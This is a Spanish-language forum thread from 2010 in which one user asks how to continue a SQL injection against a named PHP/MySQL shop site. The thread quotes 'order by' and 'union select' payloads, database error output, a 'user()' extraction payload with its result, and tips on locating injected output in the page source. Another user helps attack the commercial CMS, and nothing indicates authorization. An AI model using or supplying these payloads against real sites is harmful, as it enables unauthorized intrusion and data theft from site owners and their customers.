Ayuda como seguir con SQL Inyection

Iniciado por nuevaorden, 22 Marzo 2010, 20:08 PM

0 Miembros y 2 Visitantes están viendo este tema.

nuevaorden

Salu2,

Tengo una página que he podido, por lo menos saber las columnas de su base de datos que tiene, está creada en php y core sobre Mysql:

http://www.lapaginaweb.com/index.php?contingut=2&codi=-1%20order%20by%205/*

Poniendo al final /* me deja ver que hay 5 porque si pongo 6 me peta.

El problema está seguir, he provado con:

-1+union+all+select 1,2,3,4,5/*

Y nada me da este error:

No s'ha pogut llegir select * from contingut where codi=-1 union all select 1,2,3,4,5/*

Alguien sabe como proseguir.... gracias para la ayuda a un newbaby!!!!!

WHK

#1
talves porque necesita procesar un valor válido para poder mostrarse.
me da la impresión de que es blind sql o tendrás que ingeniartelas para fabricar una query tan fiel como la original y solo modificando un valor de una columna.

PD:
el código original no será este?
CitarNo s'ha pogut llegir select articles2.*, articles2_idioma.text as descr, articles2_idioma.text_curt as text_curt from articles2, articles2_idioma where codi= and id_idioma=2 and codi=id_article

nuevaorden

Salu2, no se donde has sacado el codigo pero no es este intentare con blind sql, no se si me servirá......... si me puedes aportar algo mas me lo dices mil gracias

WHK

Bueno, por lo que he podido averiguar, ese sistema web que observas es un sistema CMS para shopping creado por
http://www.comunicatek.com/

y hay varias por internet.

yo mientras tanto pruebo acá y tu pruebas ayá.

Ese sitio web debe tener un buscador:
http://ejemplo.com/buscador.php?idioma=2 union select user(),2,3 --
u00061@localhost

con eso ya podrías inyectar libremente.
Lo raro que me fijé en este sistema es que cuando intentas obtener las columnas con order by siempre te retorna un numero mas elevado de columnas que el real, por ejemplo a mi me retornaba que habian 4 columnas pero eran solo 3 al igual que en la tabla de productos, también es resultado menos uno.

el resultado queda en el código fuente, no lo verás desde el explorador directamente.
Para eso haz view-source:htt://ejemplo... y buscas esto:
<option value='33'><option value='
ahi en ese valor te aparecerá tu inyección.

Saludos.

nuevaorden


WHK

googleando :P y viendo el código fuente, etc

nuevaorden

No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc

mmmmmm

nuevaorden

OK PROVANDO, y como dices tu es de esta gente si !!!

WHK

prueba con el buscador como te puse mas arriba

nuevaorden

no tiene buscador............. buscando mas